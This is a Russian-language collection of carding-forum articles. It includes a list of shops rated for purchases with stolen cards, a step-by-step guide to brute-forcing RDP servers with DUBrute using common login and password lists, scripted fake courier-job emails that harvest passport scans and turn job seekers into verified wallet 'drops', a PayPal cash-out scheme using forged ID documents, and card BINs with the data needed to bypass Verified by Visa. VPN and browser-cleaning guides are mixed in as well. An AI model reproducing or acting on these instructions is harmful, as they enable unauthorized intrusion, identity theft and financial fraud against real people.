+ БОНУС
plus2city.com
amwaybuychina.com
trueman-ecig.com
a-costit.com
wholesalekingdom.net
lowpstore.com
reachtotrade.com
wholesalehere.net с СС пополнение
oskau.com с СС пополнение
china-photo-supplier.com
e-cigbattery.com
ok-wholesale.net с СС пополнение
vovomart.com с ПП ебашить (баланс не пополнять)
a123rc.com
chinashop-easy.com ТУТ баланс инвойсом на палку
global-wholesale.net шоп с пополнением баланса ДОРОГАЯ ДОСТАВКА
wholesale-orders.com шоп с пополнением баланса ДОРОГАЯ ДОСТАВКА
fashion71.net
dress-whsle.com
martofchina.com
lovelywholesale.com
wholesale9.net


Неанонимный анонимный bitcoin

Давно я ничего не публиковал тут. Но поскольку периодически люди пишут мне то в ЛС, то в жабу на тему статеёк, то я решил потихоньку начать постить уже написанный материал. Для того чтобы не заспамить раздел и для сохранения интереса постараюсь постить по 1 статье каждые 1-3 дня.
И так, сегодня мы поговорим о bitcoin. Я думаю не стоит обсуждать саму валюту, кошельки, транзакции и прочеё. Если кто-то не знаком с битками, что мало вероятно, то обязательно загуглите и начните пользоваться, так как все больше сервисов и людей в серых и черных движениях начинают принимать битки, урезая другие способы оплаты.
Теперь об анонимности. Сразу хочу сказать, что не нужно писать типа "это всем известно блаблабла", это далеко не так. Как я заметил, многие почему-то считают биткоин панацеёй анонимных финансовых операций в сети и очень удивляются когда узнают следующую ниже информацию.
По сути, биткоин это псевдоанонимная криптовалюта. Псевдоанонимная, потому что вся её анонимность заключается в неизвестных данных хозяина кошелька. Однако все операции и баланс кошелька находятся в открытом доступе. Так же можно найти информацию о любой транзакции с начала существования bitcoin (именно поэтому при первом запуске bitcoin core так долго что-то качает, это что-то - информация по всем платежам со старта биток).
Как можно посмотреть информацию по любому кошельку в системе биткоин? Легко и просто. Нам нужен сайт duckduckgo.com ("Поисковая система, которая не следит за вами", как написано на главной странице, что кстати не совсем так) и адрес интерисующего нас кошелька. Например нас интерисует один из кошелков, связанных в 2013 году с делом по silkroad - 1933phfhK3ZgFQNLGSDXvqCn32k2buXY8a. Вводим кошелек в строку поиска и видим его баланс (который сейчас, конечно, нищий, ведь силкроад прикрыли), а так же общеё количество принятых и отправленных средств, которое впечатляет.
Для просмотра транзакций, переходим по ссылке ниже на biteasy.com, как видим первая транзакция в системе - Jul 2 2011 2:42 AM, об этом и говорилось выше - биткоин всё помнит.
Теперь от неприятного (т.е. возможности любого человека посмотреть ваш баланс и транзакции), к приятному моменту: вы тоже можете это делать. Поскольку сервисы и продавцы обычно не любят
менять кошельки, а работают с одним или несколькими долгое время, то перед покупкой чего-то за битки вы можете посмотреть движения средств на кошельке продавца и оценить возможный риск покупки по этим косвенным данным.
Как-то так, всем добра и анонимности.


Раскрутка в Контакте

В интернете много рекламы о раскрутке групп в контакте, решил вам его раскрыть.
И так секрет прост.
Заходим на сайт по раскрутке в контакте к примеру likest.ru, в нем нужно выполнять разные задания за которые вам будут присвоены сердечки(валюта сайта) допустим добавить в друзья Васю Пупкина и за это получить 2 сердечка или поставить лайк Маше Петровой и за это получить теже 2 сердечка (цену выставляет тот кто заказывает услугу). Но это долго и нудно и мы это делать не будем. А секрет состоит в том что эти сердечки продают купонами, которые можно активировать на том же сайте в примере взят likest.ru, купон на 1000 сердец стоит до 30р. цену можно указать допусти 2 сердца=500 человек.
За них вы сможете заказать себе подписчиков или друзей или лайки, ну в общем что кому нужно.
Так же на сайте можно выставить критерии по которым будет сортировка людей. Пол/возраст/страна/город/вес/рост (шучу конечно, последние 2 пункта)
Сайт по продаже купонов http://ajsakk.deer.io/
На этом сайте так же продаются купоны от других сайтов по накрутке которые работают по такому же принципу.


Пробив SSN на валид

Переходим на сайт www.ssnvalidator.com вбиваем SSN. Вам напишет валид или нет.


Брут RDP (Дедики)

Привет всем, по просьбам пишу мини статью по бруту.
Весь софт берём с http://dservers.ru/
Последовательность:
- Найти диапазон нужной страны.
- Просканить на открытый порт для удалённого управления (получить список рабочих дедиков).
- Запихнуть в брут и начать брутить.

Поехали!)
https://www.countryipblocks.net/country_selection.php (я юзал этот сайт. сайтов с диапазонами полно гуглите.)
Выбираем страну, в Select Format: галоку ставим на IP Range и жмём кнопку Creat ACL.
Справа появится окно что-то типо этого:
"# Copyright 2014 Country IP Blocks LLC
#all rights reserved.
#This list may not be redistributed in any form.
#this list includes network data on the following countries:
#AFGHANISTAN
5.10.66.216-5.10.66.223
5.10.72.72-5.10.72.79
5.10.78.240-5.10.78.247
.........."
Вот всё что ниже слова афганистан и есть диапазоны.
Качаем прогу для скана http://dservers.ru/kportscan-3-0/ в проге всё настроено только потоки меняйте с 400 на 1000 и в левое окно запихиваем диапазоны. (на 7ке бывает конфликт у неё и вылетает, тогда заходим в файл Резалтс смотрим нижний IP в диапазонах ищем его и всё что Далее продолжаем сканить и ставим галку "append to file")
Мы отсканили и получили файл с ip которые дедики. Теперь надо брутить доступ.
Программа DUBrute 2.1 http://dservers.ru/dubrute-2-1-update-03-03-12/
Антивирус ругается вырубаем его, нужны права админа для запуска.

1) Запускаем DuBrute 2.1 и нажимаем Generation.
2) Нажимаете File IP и выбираете сканированный диапазон ( айпишники )
3) Нажимаете File Login и выбираете логины ваши, они находится в папке с брутом.
4) Нажимаете File Pass и выбираете Пароли ваши, находятся там же.
5) Нажимаете Make, потом OK. И можете закрывать Окошко это.
6) Здесь надо поставить число Потоков. ( Зависит от скорости Интернета) если меньше 2мб то болеё 50 не ставить. если 10мб входящей и ИСХОДЯЩЕЙ, то можно 100-200. и так Далее
7) Здесь ставим от 1 до 10 вообщем (я ставлю 2), больше не надо. ( Что это? Ответ: Это повторное соединение с дедиком. То есть, если первый раз не зайдет по каким то причинам, он будет пробовать столько раз заходить, скольку у вас стоит... Думаю Понятно. )
8) Это время с дедиком, то есть... Если Дедик не умрёт за 20 мин. то он зачислится в список good. Нажимаете ОК. Нажимаете Start. После брут RDP закончен.

Так на XP не варик брутить, можно на дедиках запускать из халявы или своих сервера предпочтительнеё естественно чем больше оперативы и проц + интернет тем больше скорость брута.
По логинами нам ведь под вещевуху в основном, поэтому брутим популярные логины типа таких:
administrator
admin
user
guest
test
support
касса
магазин
сервер
мастерская
Пишу в ру т.к. на инглише можно втюхивать или под страну тогда гугл транслит нам поможет вот пример для Испании я брутил:
administrador
usuario
tienda
soporte
prueba.
Ну пример ясен думаю.
Пароли обычно зеркало логинов+(пробел пустота) 0, 1, 123, qwerty, 1234, 12356 и т.д для новых серверов вроде минималка пароля 7или 8 символов значит 12345678 как то так.
Запихиваем не болеё 30к ипов в дубрут иначе он потом в ошибки будет по середине брута кидать
Если сбрутили админ права делайте свою админскую учетку с паролем и всё по ней заходите.
Так же предлагаю ниже скидывать файлы ip отсканированых (дабы понадобилась к примеру та страна сразу скачал запихнул 1 логин и пару паролей и МИГОМ сбрутил пару дедов).


Добыча электронных кошельков и сканов документов

Небольшая статья для начинающих, по добыче электронных кошельков и сканов документов.

Постараюсь писать сухо, без воды, на примере идентифицированного яндекс кошелька. Нам потребуются:
- VPN.
- Соксы.
- Программа типа KeePassX (удобный, простой менеджер паролей с открытым исходным кодом).
- Программа типа CCleaner.
Включаем VPN. Открываем виртуалку, меняем ID firefox, buildID состоит из даты установки браузера
вида ГГГГММДДЧЧММСС (год-месяц-день-час-минута-секунда), у многих он выглядит примерно так
20130111014537. Открываем в огнелисе страницу about:config, находим значение browser.startup.homepage_override.buildID - вот он! Наш идентификатор Но не торопитесь! Изменить его можно, но лис на то и лис, что будет все равно отдавать верное значение. Тогда мы создаем новый
параметр типа строка general.buildID.override с любым похожим значением. Надеваем сокс. Чистим CCleaner-ом. Проверяем на http://whoer.net/extended.
Заводим почтовый ящик на gmail. С английского или американского сокса, подтверждения по телефону обычно не требуется. Идем на авито, выбираем город, регистрируемся и даем объявление в разделе: вакансии/без опыта работы, студенты. По типу: «Требуются курьеры для компании производителя электронной техники. Оплата сдельная от 500р.-до
1000 р. за заказ, в зависимости от суммы заказа. При доставке 3-5 товаров в день Вы можете заработать в месяц до 100 000 рублей. От Вас - ответственность и желание работать, автомобиль не обязателен.
Пишите Ваши контакты и пару слов о себе нам на почту [email protected]»
При регистрации на авито указываем ту же почту: [email protected], а вместо телефона - факс любой гостиницы в том же городе.
Примерно через пол часа, после авто-проверки, объявление появится на сайте, еще через два часа надо будет отвечать на письма желающих легких денег. По Москве обычно на 100 просмотров - 10 писем с вопросами о подробностях работы.
Отвечаем им письмом подобного содержания:
«Здравствуйте!
Мы являемся крупным китайским производителем и экспортером электронной техники Multi-Gold
Industrial Limited (www.yourelectronicszone.com). В третьей декаде августа запланирован запуск локальной русской версии сайта и начнется активная реклама для русскоязычной аудитории. Мы организовываем оперативную доставку заказов покупателям - с получением денег от них при передаче и проверке ими заказанного товара, для этого нашей компании требуются ответственные менеджеры-курьеры.
Схема работы. Раз в неделю курьер получает от магазина посылку с товаром (мини-партию) и обеспечивает сохранность этого товара, а так же доставку отдельных заказов покупателям. От курьера
не требуется никаких залогов и предоплат.
Когда интернет магазин получает заказ - отправляется электронное письмо курьеру с телефоном, адресом покупателя и описанием заказа (количество, наименование, стоимость). Курьер созванивается с покупателем, договаривается на время и место передачи посылки. При передаче посылки курьер, после проверки товара покупателем, получает оплату за заказ, которую затем передает интернет магазину через платежный сервис, сразу вычитая из полученной суммы 1 000 руб за свои услуги. Первое время, раз в неделю, Вы будете получать небольшие посылки (до 10 наименований). Когда интернет магазин убедится в качестве и надежности Вашей работы, количество товара будет увеличиваться до того объема, пока Вас это устраивает и Вы справляетесь. Выполняя доставку всего 3-4 заказов в день можно зарабатывать от 100 000 рублей в месяц.
С Вами будет заключен контракт, как с материально ответственным лицом, отвечающим за сохранность получаемого от магазина товара. Начало работы планируется с третьей декады августа, но формирование группы курьеров происходит уже сейчас, так что если Вы хотите попасть в команду курьеров - будьте оперативны с принятием решения и пересылкой необходимой нам информации.
Поскольку офиса магазина еще нет в вашем городе, контракт будет заключаться дистанционно. От Вас, для включения в команду курьеров, на данном этапе необходима информация (так * помечены обязательные поля):
* 1. Номер Вашего мобильного телефона.
* 2. Адрес Вашего проживания.
* 3. Цветные сканированные копии Вашего паспорта (главный разворот и разворот с пропиской).
4. Цветная сканированная копия ИНН
5. Документ, подтверждающий Ваш адрес. Это может быть квитанция ЖКХ (газ, вода или электричество), договор о найме жилья или справка с банка.
На основании Ваших данных, после проверки и идентификации, с Вами будет заключен контракт.
Я - менеджер данного проекта, по развитию курьерской службы доставки заказов на территории России и все вопросы и необходимую информацию присылайте мне в ответ на это письмо.
С наилучшими пожеланиями!
Екатерина Самойлова, старший менеджер по локализации проекта курьерской доставки на территории РФ.

P.S. Если по каким либо причинам Вы не можете сделать цветные сканированные копии документов, то нас устроит цифровая фотография, в хорошем качестве, необходимых нам документов. »
В ответ на такое письмо, обычно трое из десяти присылают сканы, двое задают вопросы, потом то же присылают, если мы их не отсеяли, СЛИШКОМ УМНЫЕ ИЛИ ПОДОЗРИТЕЛЬНЫЕ НАМ НЕ НУЖНЫ.
На следующий день, приславшим сканы, отправляем письма подобные этому: «Здравствуйте. Сообщаем Вам, что Ваша кандидатура одобрена.
Осталось пройти идентификацию Вас и будущего счета (для передачи денег, полученных от покупателей) в любом удобном Вам салоне Евросети.
Поймите нас правильно, компания не может посылать товар без полной проверки личности получателя. Стоимость мини партии товара, которую Вы получите от нас для распространения
конечным покупателям - 5-10 тысяч евро, и Вы получите этот товар без предоплат и залога.
Если Вас устраивают наши условия, напишите нам, и мы вышлем Вам инструкцию, как пройти идентификацию личности в любом, удобном Вам, салоне Евросети.
С наилучшими пожеланиями!
Екатерина Самойлова, старший менеджер по локализации проекта курьерской доставки на территории РФ.»
Обычно из пяти приславших сканы, трое соглашаются пройти идентификацию и просят инструкцию.
Раз просят - даём:
«Здравствуйте.
Высылаю Вам инструкцию по идентификации.
К письму прикреплено уже заполненное заявление для идентификации электронного счета и Вашей личности.
1. Проверьте правильность заполненного заявления.
2. Распечатайте его.
3. С паспортом и заявлением пройдите в ближайший салон «Евросеть».
4. Скажите кассиру, что хотите пройти идентификацию. Заплатить за идентификацию в «Евросети» нужно будет 50 рублей. Это оплата за сервис идентификации, который предоставляет Евросеть. В дальнейшем вы сможете вернуть эти деньги себе сразу после первого заказа.
5. Отдайте паспорт и заявление. Кассир введет данные и распечатает предварительный чек.
6. Внимательно проверьте паспортные данные и на этом чеке. Если что-то не так, попросите кассира исправить информацию. Если всё правильно, подпишите чек.
7. После прохождения идентификации отпишите нам, что бы мы успели своевременно оформить трудовой договор.
После процедуры вы сможете передавать полученные деньги через идентифицированный счет без лимитов и других проблем.
Эта процедура поможет нам убедиться, что Вы именно тот, кому принадлежат высланные Вами документы.
С наилучшими пожеланиями!
Екатерина Самойлова, старший менеджер по локализации проекта курьерской доставки на территории РФ.»
Прежде чем отправить письмо, заходим на сайт money.yandex.ru и САМИ регистрируем кошелек.
Логин выбираем по фамилии, в английской транскрипции, нашего дропа. Пароль создаем сложный, с помощью KeePassX. Для приема смс, можно пользоваться услугами регистраторов, их можно найти на даркмоней или ачате. Выбираем идентификацию через Евросеть, нажимаем на ссылку «Заполните заявление» и переходим по ссылке. Внимательно заполняем заявление, печатаем в файл, переводим в PDF и отправляем вместе с инструкцией по идентификации.
Только самые ленивые не дойдут до Евросети и не идентифицируются. То, что кошелек идентифицирован мы увидим по соответствующему значку идентифицированного пользователя.
Рекомендации.
Между идентификацией и «Открытием в России» должно пройти не менеё полутора месяцев. Не забывайте переносить открытие, так кошелек дольше прослужит.
Трудовой договор высылается с первой партией товара, в двух экземплярах.
Один яндекс кошелек - один сокс, можно на этом соксе сделать WM или еще какой нибудь кошелек, но не заходите с одного сокса в несколько кошельков одного вида.
Подходите к этому делу творчески, меняйте тексы писем и объявлений, не копируйте со статьи. Лимит на отправку писем с gmail не болеё 20 в час. Если даете объявления по разным городам - меняйте текст объявления, почту, ID браузера и чистите CCleaner-ом систему. Оставайтесь людьми, если дроп, после всех мытарств, спашивает - можно ли ему устроится на работу до «открытия компании в
России» обязательно пишите, что можно, Вы проинформируете его письмом и на первых порах он сможет совмещать обе работы.


Автоматическая чистка бразера

Всем приет! Хочу познакомить вас с плагиином из разряда маст хэв, которй будет автоматически чистить браузер при его закрытии, удалит абсолютно все следы! Встречайте Click&Clean. Алгоритм работы прост, установил, настроил и забыл.

Покажу на примере Firefox, для хрома вроде тоже есть.
Скачиваем и устанавливваем плагин https://addons.mozilla.org/en-US/firefox/addon/clickclean/
Перейдите в меню настроек плагина и выставите все галочки как на скрине

Всё! Теперь не надо постоянно помнить, чистил ты браузер или нет, после его закрытия он сам себя почистит.


Лёгкий способ обнала PayPal через польские карты

Выводим живучие от 3-х дней балансы на польские препейды.

1. Идём сюда https://bitcointalk.org/index.php?topic=254533 (ссылку копируйте, а не жмите с форума)
2. Пишем продавцу на @gmail, заказываем карту VISA MB EUR, уточняем что нас интересует "Digital Delivery", оплачиваем 30$, получаем карту в форме сканов. Нужно её активировать аплоадом любой суммы сепой
3. Идём сюда https://localbitcoins.com/ru/ (ссылку копируйте, а не жмите с форума)
4. Регаемся, создаем и пополняем BTC-кошелек на ~5$. Фильтруем поиск и получаем список баеров кто платит сепой. В инфо баера читаем правила проведения сделок, списываемся, оформляем сделку.
5. Через 2-3 дня чекаем онлайн карты, видим пополнение, карта становится активной. Ссылку на онлайн найдете в FAQ который селлер высылает вместе со сканами карты. В онлайне одноразовые сессии.
6. Идём в гугл, собираем фулку для палки одной из 20 стран, где разрешен вывод на прикрепленную карту. Регаем акк палки, страну выбираем например Italy, Romania, Latvia, Israel, Turkey. Юзаем чистый SSH.
7. После стандартной инфы, добавляем купленную карту, отправляем минидеп с кодом. Заходим в онлайн карты, видим транзу и код. Вбиваем код в конфирм карты, получаем подтвержденную карту и вериф акк.
8. В последнеё время эти препейды стали фильтроваться, и после конфирма карты акк автоматом уходит в лимит. Рисуем PhotoID и CC Statement. Художника берем на любом из бордов.
9. Загружаем доки, ждем пару дней для апрува. Если у художника все ок с руками и вы собрали фулку на реал инфу, доки проходят и лимит снимается. На примере рисовалась Румыния на инфо из гугла.
10. Акк готов для вывода живучих от 3-х дней балансов. Заправляем бабки, жмем withdraw to card, через тройку дней видим смену pending на completed. Еще через тройку дней бабки видны в онлайне препы.

Налятся препы только вбивом, например скрил, пайза, нетеллер, энтра.


Как подключить внешний диск\флешку в VirtualBox

В ходе переписки со своим одногрупником, появилась проблема, а точнеё, это не знание как подключать внешние носители или часть родного винта к виртуалке в VirtualBox. Все действия будут происходить Windows - Windows, на Linux работает Drag and Drop, т.е можно просто перетащить файл с основной ОС на вирт.машину.

ВНИМАНИЕ! У вас должны быть установлены драйвера от VirtualBox, если вы этого еще не сделали, то необходимо их установить: Устройства - Подключить образ диска Дополнений гостевой ОС - будет автозагрузка или откроется содержимое диска (в зависимости как настроена ваша система), если просто откроется содержимое, то устанавливаем ту версию драера, котора соответствует вашей ОС -
х86(х32) или х64. При установке необходимо поодключчение к иинтернету, в ходе установки нужно будет несколько раз согласиться с лицензией, затем необходимо перезагрузить вирт.машину.

Приступим, для этого нам надо запустить виртуальную машину.
1. Устроства - Настроить общие папки
2. Нажимаем добавить общую папку, в появиввшемся окне выбираем «Другой»
3. Появится окно обозревателя, там выбираем нужный вам раздел диска\папку\флешку\съемный, в общем что нужно, то и выбираем.
4. После выбора папки у вас пропишется путь до неё и имя, имена папок на русском стоит избегать, либо переименовывать. Нажимаем ОК-ОК. Это мы указали путь и имя до папки, к которой хотим подключиться.
5. Теперь подключим это в виртуальной машине, чтоб она его увидела и вы смгли на него зайти. ПКМ Мой компьютер - Подключить сетевой диск
6. В появившемся окне попишим команду для подключения диска, выбор буквы носителя не имеёт значение, ставим любой или не трогаем. Прописываем следующее \\vboxsvr\f_driveгде \\vboxsvr\ - обязательно прописывваем в точности как указано f_drive - имя подключаемого диска, у вас может быть другим.
7. После того, как нажмете готово, подключится и откроется диск.
Всё, вот такие не сложные манипуляции позвляют подключить к виртуалке внешние носители.


Поднимаем свой VPN за 10 баксов в месяц в течении 20 минут. Пошаговый мануал.

В связи с последними событиями вокруг сикретс лайн, прочитав вот эту статью, решил написать свою версию.
Версия для тех, кто никогда не видил/не админил -NIX системы.

Установка и настройка OpenVPN версии 2.1.3 на арендованом VDS/VPS с CentOS 5. Пошаговый мануал.
UPD: Исправил ман под разные архитерктуры серверов.

Введение.
Описывать отличие PPTP от OpenVPN здесь не буду, это тема отдельной статьи, поверьте на слово, что
OpenVPN на порядок лучше и безопастнеё PPTP.
Для желающих узнать больше на эту тему - кратко в сравнительной таблице.

Что нам понадобится?
- Арендованый VPS/VDS с root доступом.
Список провайдеров и организаций, предоставлющих такие сервера, можно найти на любом сайте, посвященному обзору хостинга.
- Установленная на сервере CentOS 5.
Зачастую при заказе VPS/VDS провайдеры и организации предлогают сразу выбрать предустановленную ОС. Выбираем CentOS 5.
- Для полной анонимности - платежный метод, по которому невозможно узнать ваши личные данные.
Это может быть, например, виртуалка, купленная на plati.ru или платежная система типа w1.ru, персонализация в которой ПОКА не нужна и кошелек в которой можно пополнить через терминалы или обменом другой валюты. Списки обменников ищем на bestchange.ru или любом другом мониторинге обменников.
- Клиент для удаленного доступа на сервер по SSH под названием PuTTY
- Клиент для передчи данных по SFTP (Secret FTP) WinSCP
- OpenVPN GUI клиент для Windows, с помощью которого мы и будем подключаться к нашему VPN-у.

Что мы получим в итоге?
Как минимум:
- Сокрытие реального IP адреса.
- Сжатие траффика благодаря установленному алгоритму сжатия данных имени Лемпеля-Зива-Оберхеймера (LZO). Актуально для тех кто сидит на 3G.
- Собственноручный контроль над логами, как следствие - спокойный сон и крепкое здоровье.
- Небольшой опыт в собственноручном администрировании сервера, работающего на nix-ах

Итак, поехали
После оплаты VPD/VDS вам выдадут IP-адрес сервера и пароль для пользователя root.
Нам нужно зайти на сервер как root.
Запускаем PuTTY и вводим в строку Host Name (or IP address) IP нашего сервера, порт оставляем 22 (это порт SSH), жмем Open.
Для примера я буду использовать IP-адресс 156.156.156.156
Вводим root и жмакаем Enter.
Копируем наш пароль на сервер из тектовичка/админки хостера, в окне PuTTY жмем правую кнопку мыши (нажатие на правую кнопку мыши в PuTTY аналогично комманде Ctrl+V), жмакаем Enter.
Поздравляю, вы на зашли на сервер как root. Если получаем ответ Access denied - неправильно введен пароль.
Все комманды, указаные ниже, нужно просто копировать, вставлять в PuTTY и жмакать Enter.
Для начала проверим наличие драйвера TAP\TUN коммандой. Всё в порядке.
Если же нет -
1) Нужно пересобрать ядро дистрибутива самостоятельно. Это не так страшно как звучит и занимает 5 минут времени.
2) Нужно написать в саппорт хостера следующеё "Пожайлуста, активируйте TUN/TAP устройства".
Итак, TAP\TUN на месте, устанавливаем пакеты, необходимые для OpenVPN.
Проверяем версию Centos и архитектуру сервера следующими коммандами
Скачиваем необходимые пакеты:
Для архитектуры i386
Для архитектуры x86_64
Устанавливаем rpm-пакеты и добавляем репозитории:
Для Centos 5.x и i386 (для x86_64 архитектуры меняем "i386" на "x86_64")
Для Centos 6.x и i386 устанавливаем следующие rpm-пакеты и добавляем репозитории (для x86_64 архитектуры меняем "i386" на "x86_64")
Копируем файлы OpenVPN в новую директорию.
Переходим к генерации ключей.
Загружаем переменные из vars в оболочку:
Удаляем из папки keys старые ключи и сертификаты:
Начинаем генерацию Master CA (Certificate Authority):
Во время генерации сертификата везде жмем Enter, кроме строки
Common Name (eg, your name or your server's hostname)
Сюда вписываем - это будет у нас имя ключа.
Дальше генерируем сертификат для сервера:
Во время генерации сертификата везде жмем Enter
На вопросы, требующие выбора Y/N везде отвечаем Y.
Сгенерируем сертификат клиента:
Во время генерации сертификата везде жмем Enter\
На вопросы, требуещие выбора Y/N везде отвечаем Y.
Сгенерируем ключ DH (Diffie Hellman):
Создадим ключ для TLS-аутентификации:
Все, мы сгенерировали все что нужно.
После проделаных действий в каталоге /etc/openvpn/2.0/keys появятся все наши ключи.
Файл ta.key будет в каталоге /etc/openvpn/2.0, скопируем его к ключам
Создаем конфигурационный файл server.conf и открываем его на редактирование:
Если выдается ошибка о том что текстовый редактор Nano не установлен - устанавливаем его
И опять пробуем открыть файл конфига:
Помещаем в него следующие строки:
Выходим и сохраняемся- комбинация кнопок Ctrl+х, дальше буква Y и Enter.
Хочу прокомментировать некоторые параметры, указаные в конфиге.
push "dhcp-option DNS 208.67.222.222"
push "dhcp-option DNS 208.67.220.220"
Это DNS-ы принадлежащие opendns.com. При желании их можно заменить любыми Free DNS серверами, список прикреплен в самом низу статьи.
max-clients 2
Здесь указано максимальное кол-во одновременных подключений к серверу, в данном случае два клиента.
duplicate-cn
Строка указывает на то, что может быть использован один сертификат для нескольких клиентов.
Это если вы хотите дать попользоваться VPN-ом другу/брату/свату.
Если будете пользоваться только вы один - можете вообще убрать эту строку, а в max-clients указать 1.
verb 0
Строка указывает, как подробно нужно вести логи, значение от 0 до 3.
0 - логи не ведуться, 3 - логи ведуться подробно.
log /dev/null
status /dev/null
log-append /dev/null
Строки указывают, куда мы пишем/шлем логи А шлем мы их в нулл, другими словами (не вдаваясь в подробности) - удаляем.
В связи с ограничением символов на один пост 10000 символов пришлось разбить старпост на 2 части.

Продолжение:
Вернемся к нашим баранам и настроим сетевые параметры сервера.
Разрешим ip-fowrwarding:
Изменяем в файле значение net.ipv4.ip_forward на 1.
Выходим и сохраняемся.
Для применения параметров выполняем комманду:
Теперь нам нужно открыть порт 1194 (его мы прописали в конфиге, в файле openvpn.conf).
Для этого выполняем комманду:
Если получаем сообщение об отсутствии утилиты, инсталируем её:
И опять запускаем:
В появившимся окошке, похожем на старый-добрый Norton Commander, выбираем кнопку
"Customize" и в поле «Other ports» пишем:
Дальше жмем ОК, потом еще раз ОК.
Теперь добавим правила в фаервол, включающие трансляцию адресов (NAT), дабы пакеты от
клиента попадая на сервак могли уйти в инет и также вернуться назад:
ХХХ.ХХХ.ХХХ.ХХХ - IP-адрес вашего сервера.
Сохраним настройки таблицы iptables и добавим их в автозагрузку:
Проверим, все ли правильно записалось:
Вывод комманды должен быть такой:
Если вывод комманды не такой, как выше. Выполняем следующие комманды.
Всё, по сути все готово, теперь осталось только запусить наш OpenVPN сервер:
Если ошибок не выдало - сервер запустился.
Если выдает ошибку - копируем текст ошибки в топик на обсуждение или же сами ищем в гугле решение проблемы.
Тепрь можно вернуться в любимую винду, инсталируем OpenVPN GUI.
После инсталяции не выключая PuTTY запускаем WinSCP.
В графу Host name вводим IP-адрес нашего сервера, Port number: 22, User name: root
Подключаемся, вводим пароль на сервер, видим каталоги и файлы на сервере в знакомом графическом формате
Переходим в папку /etc/openvpn/2.0/keys/
Копируем себе на винт в папку C:\Program Files(x86)\OpenVPN\config\ следующие файлы:
И создаем тут же файл openvpn.ovpn, открываем его на редактирование блокнотом.
В него пишем следующеё:
ХХХ.ХХХ.ХХХ.ХХХ - IP-адрес вашего сервера.
Ну и последний шаг - запускаем OpenVPN GUI, в треё на иконке правой кнопкой мыши - Connect.
Если иконка в треё загорелась зеленым - радуемся и гордимся собой.
Идем на Whoer.net/Ip-Score, проверяем IP адрес.
Должен быть IP вашего VPS/VDS.
Если по Whoer светятся ваши родные DNS:
1) Ставим плагин для FireFox под названием DNS Cache, перезагружаем браузер, на иконке плагина (внизу справа) - правая кнопка мыши - Flush DNS Cache.
Если не юзаем FireFox - жмем Win+R (Выполнить), вписываем ipconfig /flushdns
2) Если не помогла - заходим в настройки подключения (для основного адаптера + TAP-Win32 адаптера) и в свойствах IP4 прописываем DNS-ы от opendns.com (208.67.222.222 и 208.67.220.220) или любые другие Free DNS.
Для проверки входящего/ исходящего канала на сервере можно воспользоваться утилитой tcpdump.
Инсталируем её:
На клиенте, т.е. на своем компе запускаем cmd -- ping mail.ru -t
На сервере запускаем tcpdump для прослушивания интерфейса tap0 и сниффинга уходящих с сервера пакетов:
Видим, что пакеты с сервера уходят не шифрованые.
Для прослушивания канала между клиентом (компом) и сервером по интерфейсу eth0:
Видим абракадабру - все шифруется. Не видим абракадабру - что-то не так настроено, нужно разбираться.
Для полной уверености можно скачать и заснифать исходящий канал интернета с помошью
программы WireShark.
Основная проблема с которой можно столкнуться:
При подключении к серверу в статусе OpenVPN GUI видим следующеё
В таком случае пишем письмо/тикет хостеру с просьбой включить TUN/TAP устройство или же пробуем
пересобрать ядро дистрибутива самостоятельно.

Список Free DNS, которые можно юзать в настройках http://clip2net.com/s/1PCld


Бины с лёгким сбросом вбв

Бин, ниже инфа, которая требуется для сброса. Страны разные. Есть юса со сбросом по зипу. Многая инфа так-же нужна и для энролла.

Бины:

413786
Name on Card:
Signature Panel Code:
Card Expiration Date: MMYYYY
Zip Code:

449477
Name on Card:
Signature Panel Code: (CVV)
Card Expiration Date:
Zip Code:

451029
Signature Panel Code:
Name as printed on card:
Primary Cardholder Date of Birth: / / (DD/MM/YYYY)

524886
cvv
card expiry
date of birth dd-mm-yyyy

5248861
this bin Netherland
cvv
expiry
DOB

447616
Name on Card:
Signature Panel Code: ( CVV )
Card Expiration Date:
Zip Code:

434257
usa
Name on Card:
Signature Panel Code:
Card Expiration Date:
Primary Cardholder's Date of birth:

450550
signature Panel Code:
Month and Year of Birth: / (MM/YY)
Name as shown on card:
Card Expiry Date

510982
Signature Panel Code* ( CVV )
Expiration Date*
Billing Zip Code*
Date of Birth* DD/MM/YY

549123
Name on Card:
Signature Panel Code:
Card Expiration Date:
Primary Cardholder's Date of birth:

479482 caiocus island debit classic
CVV2:
Expiration Date: (MM/YY)
Name Embossed on Card:
Birth Date: (MM/DD/YYYY)

422865 PORTUGAL credit premier
Name on card:
CVV Security Code:
Expiration Date (MM / YY)
Postal Code:
Date of Birth: (DD / MM / YYYY)[/QUOTE]

451401 CREDIT CLASSIC canada
Signature Panel Code
Name as printed on card:
Primary Cardholder
Date of Birth: / / (DD/MM/YYYY)

433477 DEBIT/CLASSIC USA
name on card
cvv
card exp
zip code

513659 Switzerland
CVC Code*
Expiry Date*
Date of birth of primary card holder DD.MM.YYYY

456468 CREDIT PLATINUM Australia
Signature Panel Code
Card expiry date:
Date of Birth: (DD/MM/YYYY)

489951 Dominican Republic-CREDIT GOLD/PREM
Name on Card:
Signature Panel Code:
Card Expiration Date: MM/YY
Date of Birth: (DD/MM/YY)

446291 UK DEBIT CLASSIC
cvv
exp date
dob dd/mm/yy

492942 UK CREDIT PLATINUM
Card Expiry Date: (MM/YY)
Card Security Code:
Cardholder name as printed on the card:
Date of Birth: (DD/MM/YYYY)

403003 ITALY CREDIT CLASSIC
exp date:
dob : dd/mm/yy
zip code :

546470 Greece credit standart
Name on card:
Security Code (CVV2):
Expiration DateMM/YY)
Zip Code:
Birth Date: (DD/MM/YYYY)

557621 UNITED STATES DEBIT PLATINUM
CVV:
Card Expiration Date: MMYYYY
Zip Code:

419499 UNITED STATES DEBIT CLASSIC
Name on Card:
Signature Panel Code: Verification Code
Card Expiration Date: MMYYYY
Billing Zip Code: 12345

400667 INDIA CREDIT PREMIER
cvv
exp date
DOB DD/MM/YYYY)

548042 CREDIT STANDARD UNITED STATES
Signature Panel Code:
Expiration Date:
Billing Address Zip code:

513659 CREDIT N/A SWITZERLAND
cvv
expiry
DOB

454493 CREDIT CLASSIC INDONESIA
Credit card expiry date (mm/yy)
Date of birth (dd/mm/yyyy)
cvv2

513659 CREDIT N/A SWITZERLAND
cvv2
Expiration date *
Date of birth of the cardholder

450949 CREDIT CLASSIC AUSTRALIA
462239 DEBIT CLASSIC AUSTRALIA
Signature Panel Code:
Card expiry dateMM/YY)
Date of BirthDD/MM/YYYY)

451223 CREDIT PREMIER CANADA
Signature Panel Code:
Name as printed on card:
Primary Cardholder
Date of Birth: (DD/MM/YYYY)

А эти вроде ещё без вбв:
